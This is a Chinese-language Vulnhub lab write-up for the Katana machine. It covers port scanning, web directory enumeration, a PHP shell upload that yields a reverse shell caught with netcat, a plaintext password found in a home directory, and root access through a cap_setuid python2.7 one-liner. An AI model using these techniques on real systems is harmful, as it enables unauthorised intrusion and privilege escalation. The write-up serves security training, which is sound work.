Vulnhub之Katana靶机详细测试过程
Katana
靶机信息
名称:Katana
地址:
识别目标主机IP地址
─(kali㉿kali)-[~/Vulnhub/katana]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
Currently scanning: 192.168.56.0/24 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:06 1 60 Unknown vendor
192.168.56.100 08:00:27:4d:1a:eb 1 60 PCS Systemtechnik GmbH
192.168.56.157 08:00:27:98:a8:02 1 60 PCS Systemtechnik GmbH
Kali Linux利用netdiscover工具识别目标主机的IP地址为192.168.56.157
NMAP扫描
┌──(kali㉿kali)-[~/Vulnhub/katana]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.157 -oN nmap_full_scan
Starting Nmap 7.93 ( https://nmap.org ) at 2023-02-24 05:01 EST
Nmap scan report for localhost (192.168.56.157)
Host is up (0.00032s latency).
Not shown: 65527 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 894f3a5401f8dcb66ee078fc60a6de35 (RSA)
| 256 ddaccc4e43816be32df312a13e4ba322 (ECDSA)
|_ 256 cce625c0c6119f88f6c4261edefae98b (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Katana X
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.9.5-Debian (workgroup: WORKGROUP)
7080/tcp open ssl/http LiteSpeed httpd
| ssl-cert: Subject: commonName=katana/organizationName=webadmin/countryName=US
| Not valid before: 2020-05-11T13:57:36
|_Not valid after: 2022-05-11T13:57:36
| tls-alpn:
| h2
| spdy/3
| spdy/2
|_ http/1.1
|_http-server-header: LiteSpeed
|_http-title: Katana X
|_ssl-date: TLS randomness does not represent time
8088/tcp open http LiteSpeed httpd
|_http-server-header: LiteSpeed
|_http-title: Katana X
8715/tcp open http nginx 1.14.2
|_http-server-header: nginx/1.14.2
|_http-title: 401 Authorization Required
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ Basic realm=Restricted Content
MAC Address: 08:00:27:98:A8:02 (Oracle VirtualBox virtual NIC)
Service Info: Host: KATANA; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: 9h40m00s, deviation: 2h53m12s, median: 7h59m59s
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.9.5-Debian)
| Computer name: katana
| NetBIOS computer name: KATANA\x00
| Domain name: \x00
| FQDN: katana
|_ System time: 2023-02-24T13:02:11-05:00
| smb2-security-mode:
| 311:
|_ Message signing enabled but not required
| smb2-time:
| date: 2023-02-24T18:02:11
|_ start_date: N/A
|_nbstat: NetBIOS name: KATANA, NetBIOS user: <unknown>, NetBIOS MAC: 000000000000 (Xerox)
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 30.06 seconds
获得Shell
端口139/445
┌──(kali㉿kali)-[~/Vulnhub/katana]
└─$ smbclient -L 192.168.56.157
Password for [WORKGROUP\kali]:
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
IPC$ IPC IPC Service (Samba 4.9.5-Debian)
Reconnecting with SMB1 for workgroup listing.
Server Comment
--------- -------
Workgroup Master
--------- -------
WORKGROUP KATANA
┌──(kali㉿kali)-[~/Vulnhub/katana]
└─$ enum4linux 192.168.56.157
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Fri Feb 24 05:04:02 2023
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\katana (Local User)
识别出用户名: katana
端口21
┌──(kali㉿kali)-[~/Vulnhub/katana]
└─$ ftp 192.168.56.157
Connected to 192.168.56.157.
220 (vsFTPd 3.0.3)
Name (192.168.56.157:kali): anonymous
331 Please specify the password.
Password:
530 Login incorrect.
ftp: Login failed
ftp> quit
221 Goodbye.
┌──(kali㉿kali)-[~/Vulnhub/katana]
└─$ searchsploit vsFTPd 3.0.3
------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------------------- ---------------------------------
vsftpd 3.0.3 - Remote Denial of Service | multiple/remote/49719.py
------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
-
目标主机不允许匿名访问
-
FTP版本没有可利用的漏洞
端口80
┌──(kali㉿kali)-[~/Vulnhub/katana]
└─$ nikto -h http://192.168.56.157
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.56.157
+ Target Hostname: 192.168.56.157
+ Target Port: 80
+ Start Time: 2023-02-24 05:11:22 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.38 (Debian)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server may leak inodes via ETags, header found with file /, inode: 28f, size: 5a561ca401471, mtime: gzip
+ Allowed HTTP Methods: GET, POST, OPTIONS, HEAD
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7915 requests: 0 error(s) and 6 item(s) reported on remote host
+ End Time: 2023-02-24 05:12:11 (GMT-5) (49 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
*********************************************************************
Portions of the server's headers (Apache/2.4.38) are not in
the Nikto 2.1.6 database or are newer than the known string. Would you like
to submit this information (*no server specific data*) to CIRT.net
for a Nikto update (or you may email to sullo@cirt.net) (y/n)?
┌──(kali㉿kali)-[~/Vulnhub/katana]
└─$ gobuster dir -u http://192.168.56.157 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.js,.html,.sh,.txt
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.157
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Extensions: html,sh,txt,php,js
[+] Timeout: 10s
===============================================================
2023/02/24 05:12:54 Starting gobuster in directory enumeration mode
===============================================================
/.php (Status: 403) [Size: 279]
/.html (Status: 403) [Size: 279]
/index.html (Status: 200) [Size: 655]
/ebook (Status: 301) [Size: 316] [--> http://192.168.56.157/ebook/]
/.html (Status: 403) [Size: 279]
/.php (Status: 403) [Size: 279]
/server-status (Status: 403) [Size: 279]
Progress: 1322373 / 1323366 (99.92%)===============================================================
2023/02/24 05:15:32 Finished
===============================================================
gobuster工具扫描出/ebook目录,访问该目录,页面有admin登录链接,发现无论输入什么信息,均可登录成功。
http://192.168.56.157/ebook/controllers/
/ebook/controllers/目录有DatabaseTalking/,下面有2个文件:
Take.php
Talking.php
访问上述文件,没有任何返回,有点奇怪。
──(kali㉿kali)-[~/Vulnhub/katana]
└─$ curl http://192.168.56.157/ebook/database/readme.txt.txt
This is an simple online web store was made by using php , mysql and bootstrap.
the sql for database is put in folder sql.
the database contains many tables.
To change the localhost, username, password for connecting to database, change it only one time in
www_project/functions/database_functions.php -> db_connect() . Simple and fast
The base is localhost , root , , www_project
to connect the admin section, click the name Nghi Le Thanh at the bottom.
the name and pass for log in is admin , admin. Just to make it simple.
the 2 main things are not fully implemented is contact and process purchase.
Due to having to work with some security and online payment, the process site is just a place holder.
for futher questions, please let me know. my email: nghi.lethanh2@cou.fi
┌──(kali㉿kali)-[~/Vulnhub/katana]
└─$ gobuster dir -u http://192.168.56.157/ebook -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.js,.html,.sh,.txt
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.157/ebook
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Extensions: php,js,html,sh,txt
[+] Timeout: 10s
===============================================================
2023/02/24 05:21:40 Starting gobuster in directory enumeration mode
===============================================================
/.html (Status: 403) [Size: 279]
/.php (Status: 403) [Size: 279]
/contact.php (Status: 200) [Size: 4155]
/index.php (Status: 200) [Size: 3998]
/books.php (Status: 200) [Size: 5164]
/info.php (Status: 200) [Size: 94940]
/admin.php (Status: 200) [Size: 3153]
/book.php (Status: 200) [Size: 10]
/cart.php (Status: 200) [Size: 2702]
/purchase.php (Status: 200) [Size: 2692]
/template (Status: 301) [Size: 325] [--> http://192.168.56.157/ebook/template/]
/edit.php (Status: 200) [Size: 16]
/database (Status: 301) [Size: 325] [--> http://192.168.56.157/ebook/database/]
/checkout.php (Status: 200) [Size: 2696]
/process.php (Status: 200) [Size: 2016]
/models (Status: 301) [Size: 323] [--> http://192.168.56.157/ebook/models/]
/functions (Status: 301) [Size: 326] [--> http://192.168.56.157/ebook/functions/]
/verify.php (Status: 200) [Size: 69]
/bootstrap (Status: 301) [Size: 326] [--> http://192.168.56.157/ebook/bootstrap/]
/.html (Status: 403) [Size: 279]
/.php (Status: 403) [Size: 279]
/controllers (Status: 301) [Size: 328] [--> http://192.168.56.157/ebook/controllers/]
Progress: 1318803 / 1323366 (99.66%)===============================================================
2023/02/24 05:24:13 Finished
===============================================================
┌──(kali㉿kali)-[~/Vulnhub/katana]
└─$ curl http://192.168.56.157/ebook/database/readme.txt.txt
This is an simple online web store was made by using php , mysql and bootstrap.
the sql for database is put in folder sql.
the database contains many tables.
To change the localhost, username, password for connecting to database, change it only one time in
www_project/functions/database_functions.php -> db_connect() . Simple and fast
The base is localhost , root , , www_project
to connect the admin section, click the name Nghi Le Thanh at the bottom.
the name and pass for log in is admin , admin. Just to make it simple.
the 2 main things are not fully implemented is contact and process purchase.
Due to having to work with some security and online payment, the process site is just a place holder.
for futher questions, please let me know. my email: nghi.lethanh2@cou.fi
┌──(kali㉿kali)-[~/Vulnhub/katana]
└─$ mv ~/Downloads/www_project.sql .
┌──(kali㉿kali)-[~/Vulnhub/katana]
└─$ cat www_project.sql
-- phpMyAdmin SQL Dump
-- version 4.4.12
-- http://www.phpmyadmin.net
--
-- Host: 127.0.0.1
-- Generation Time: Dec 05, 2015 at 05:57 PM
-- Server version: 5.6.25
-- PHP Version: 5.6.11
SET SQL_MODE = "NO_AUTO_VALUE_ON_ZERO";
SET time_zone = "+00:00";
/*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */;
/*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */;
/*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */;
/*!40101 SET NAMES utf8mb4 */;
--
-- Database: `www_project`
--
-- --------------------------------------------------------
--
-- Table structure for table `admin`
--
CREATE TABLE IF NOT EXISTS `admin` (
`name` varchar(20) COLLATE latin1_general_ci NOT NULL,
`pass` varchar(40) COLLATE latin1_general_ci NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=latin1 COLLATE=latin1_general_ci;
--
-- Dumping data for table `admin`
--
INSERT INTO `admin` (`name`, `pass`) VALUES
('admin', 'd033e22ae348aeb5660fc2140aec35850c4da997');
INSERT INTO `admin` (`name`, `pass`) VALUES
('admin', 'd033e22ae348aeb5660fc2140aec35850c4da997');
端口8088
──(kali㉿kali)-[~]
└─$ gobuster dir -u http://192.168.56.157:8088 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.txt,.sh
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.157:8088
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Extensions: php,html,txt,sh
[+] Timeout: 10s
===============================================================
2023/02/24 06:09:58 Starting gobuster in directory enumeration mode
===============================================================
/index.html (Status: 200) [Size: 655]
/cgi-bin (Status: 301) [Size: 1260] [--> http://192.168.56.157:8088/cgi-bin/]
/img (Status: 301) [Size: 1260] [--> http://192.168.56.157:8088/img/]
/docs (Status: 301) [Size: 1260] [--> http://192.168.56.157:8088/docs/]
/upload.html (Status: 200) [Size: 6480]
/upload.php (Status: 200) [Size: 1800]
/css (Status: 301) [Size: 1260] [--> http://192.168.56.157:8088/css/]
/protected (Status: 301) [Size: 1260] [--> http://192.168.56.157:8088/protected/]
/blocked (Status: 301) [Size: 1260] [--> http://192.168.56.157:8088/blocked/]
/upload.html可以上传文件
/tmp/phpV0tJ0S ====> /opt/manager/html/katana_shell.php
http://192.168.56.157:8715/katana_shell.php
上传文件位置在8715端口根目录,文件名称已经被修改(但是为什么是在8715端口?不明白)
┌──(kali㉿kali)-[~/Vulnhub/katana]
└─$ sudo nc -nlvp 5555
[sudo] password for kali:
listening on [any] 5555 ...
connect to [192.168.56.206] from (UNKNOWN) [192.168.56.157] 56370
Linux katana 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2 (2020-04-29) x86_64 GNU/Linux
14:15:15 up 1:15, 0 users, load average: 0.00, 0.03, 0.07
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ which python
/usr/bin/python
$ python -c 'import pty;pty.spawn("/bin/bash")'
www-data@katana:/$
www-data@katana:/home/katana$ ls -alh
ls -alh
total 28K
drwxr-xr-x 3 katana katana 4.0K May 11 2020 .
drwxr-xr-x 3 root root 4.0K May 11 2020 ..
-rw-r--r-- 1 katana katana 220 May 11 2020 .bash_logout
-rw-r--r-- 1 katana katana 3.5K May 11 2020 .bashrc
drwx------ 3 katana katana 4.0K May 11 2020 .gnupg
-rw-r--r-- 1 katana katana 807 May 11 2020 .profile
-rw-r--r-- 1 root root 19 May 11 2020 .ssh_passwd
www-data@katana:/home/katana$ cat .ssh_passwd
cat .ssh_passwd
katana@katana12345
www-data@katana:/home/katana$ su - katana
su - katana
Password: katana12345
katana@katana:~$
提权
将linpeas.sh脚本上传至目标主机/tmp目录,修改权限,并执行脚本:
Files with capabilities (limited to 50):
/usr/bin/ping = cap_net_raw+ep
/usr/bin/python2.7 = cap_setuid+ep
katana@katana:/tmp$ /usr/bin/python2.7 -c 'import os; os.setuid(0); os.system("/bin/sh")'
< -c 'import os; os.setuid(0); os.system("/bin/sh")'
# cd /root
cd /root
# ls -alh
ls -alh
total 44K
drwx------ 4 root root 4.0K May 11 2020 .
drwxr-xr-x 18 root root 4.0K May 11 2020 ..
-rw------- 1 root root 563 May 11 2020 .bash_history
-rw-r--r-- 1 root root 570 Jan 31 2010 .bashrc
drwx------ 3 root root 4.0K May 11 2020 .gnupg
drwxr-xr-x 3 root root 4.0K May 11 2020 .local
-rw------- 1 root root 155 May 11 2020 .mysql_history
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
-rw-r--r-- 1 root root 22 May 11 2020 root.txt
-rw-r--r-- 1 root root 66 May 11 2020 .selected_editor
-rw-r--r-- 1 root root 209 May 11 2020 .wget-hsts
# cat root.txt
cat root.txt
{R00t_key_Katana_91!}
STRIVE FOR PROGRESS,NOT FOR PERFECTION